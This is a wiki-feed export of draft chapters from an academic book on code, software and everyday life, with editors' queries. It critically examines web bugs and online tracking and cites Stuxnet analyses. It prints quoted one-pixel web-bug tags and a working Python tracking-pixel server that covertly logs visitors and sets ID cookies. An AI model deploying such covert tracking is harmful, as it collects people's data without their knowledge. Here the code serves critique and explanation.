[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner was then able to match this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: careful analysis of the background images accidentally captured on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enriching process (see [http://www.president.ir/en/9172 http://www.president.ir/en/9172]; Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that three versions of the Stuxnet code may exist, released in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, however, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
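&lt;br /&gt;
A minimal sketch (in Python; the root directory is hypothetical) of this kind of filesystem ‘archeology’, walking a directory tree and listing the files that have gone longest without modification: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import os, time&lt;br /&gt;
&lt;br /&gt;
ages = []&lt;br /&gt;
for root, dirs, files in os.walk('/home/user'):   # hypothetical root&lt;br /&gt;
    for name in files:&lt;br /&gt;
        path = os.path.join(root, name)&lt;br /&gt;
        try:&lt;br /&gt;
            ages.append((os.path.getmtime(path), path))&lt;br /&gt;
        except OSError:&lt;br /&gt;
            continue                              # skip unreadable files&lt;br /&gt;
&lt;br /&gt;
for mtime, path in sorted(ages)[:10]:             # the ten oldest files&lt;br /&gt;
    print(time.strftime('%Y-%m-%d', time.localtime(mtime)), path)&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;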
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants: I draw the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species (Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4696</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4696"/>
		<updated>2012-04-18T13:34:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, although it remains within the purview of humans to seek to understand this delegated agency. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
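&lt;br /&gt;
To make the mechanism concrete, the following is a minimal sketch (in Python, standard library only; the port, cookie and values are invented for illustration) of the server side of such a tracking pixel: every request for the ‘invisible’ 1x1 image is logged, and a cookie is set so that the visitor can be recognised on subsequent pages: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
&lt;br /&gt;
# The smallest valid transparent GIF, served as the 'invisible' image.&lt;br /&gt;
PIXEL = base64.b64decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')&lt;br /&gt;
&lt;br /&gt;
class TrackerHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_GET(self):&lt;br /&gt;
        # The image is a pretext; the request metadata is the product.&lt;br /&gt;
        print('visit:', self.path, self.headers.get('User-Agent'),&lt;br /&gt;
              self.headers.get('Referer'), self.headers.get('Cookie'))&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header('Content-Type', 'image/gif')&lt;br /&gt;
        self.send_header('Set-Cookie', 'uid=abc123; Max-Age=31536000')&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        self.wfile.write(PIXEL)&lt;br /&gt;
&lt;br /&gt;
HTTPServer(('', 8000), TrackerHandler).serve_forever()&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;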
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
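&lt;br /&gt;
Even without untangling an obfuscated script itself, something of what is transmitted can be seen by unpacking the query string of a beacon request, as in this minimal sketch (in Python; the tracker domain and parameters are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
from urllib.parse import urlencode, parse_qs&lt;br /&gt;
&lt;br /&gt;
# What a beacon sends back travels in the query string of the pixel URL.&lt;br /&gt;
payload = {'uid': '4B31-C2FB', 'page': '/article/42',&lt;br /&gt;
           'ref': 'google.com', 'res': '1280x800'}&lt;br /&gt;
query = urlencode(payload)    # appended to the tracker's pixel URL&lt;br /&gt;
print('http://tracker.example.com/ping?' + query)&lt;br /&gt;
&lt;br /&gt;
# The same string, unpacked as an analyst would read it.&lt;br /&gt;
for key, values in parse_qs(query).items():&lt;br /&gt;
    print(key, '=', values[0])&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;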
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from these relative encounter rates, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, in which the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
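&lt;br /&gt;
Honouring the flag would be technically trivial, which underlines that the obstacles are commercial rather than technical; a minimal sketch (in Python/WSGI; the application is hypothetical): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# The browser sends the opt-out preference as the DNT request header;&lt;br /&gt;
# whether it is respected is entirely at the server's discretion.&lt;br /&gt;
def app(environ, start_response):&lt;br /&gt;
    if environ.get('HTTP_DNT') == '1':&lt;br /&gt;
        body = b'Not tracking this visit.'&lt;br /&gt;
    else:&lt;br /&gt;
        body = b'Tracking cookies may be set.'&lt;br /&gt;
    start_response('200 OK', [('Content-Type', 'text/plain')])&lt;br /&gt;
    return [body]&lt;br /&gt;
&lt;br /&gt;
# Serve with: wsgiref.simple_server.make_server('', 8000, app).serve_forever()&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;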
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs under development is [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites'. An Iranian web tracking and data analytics website, it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
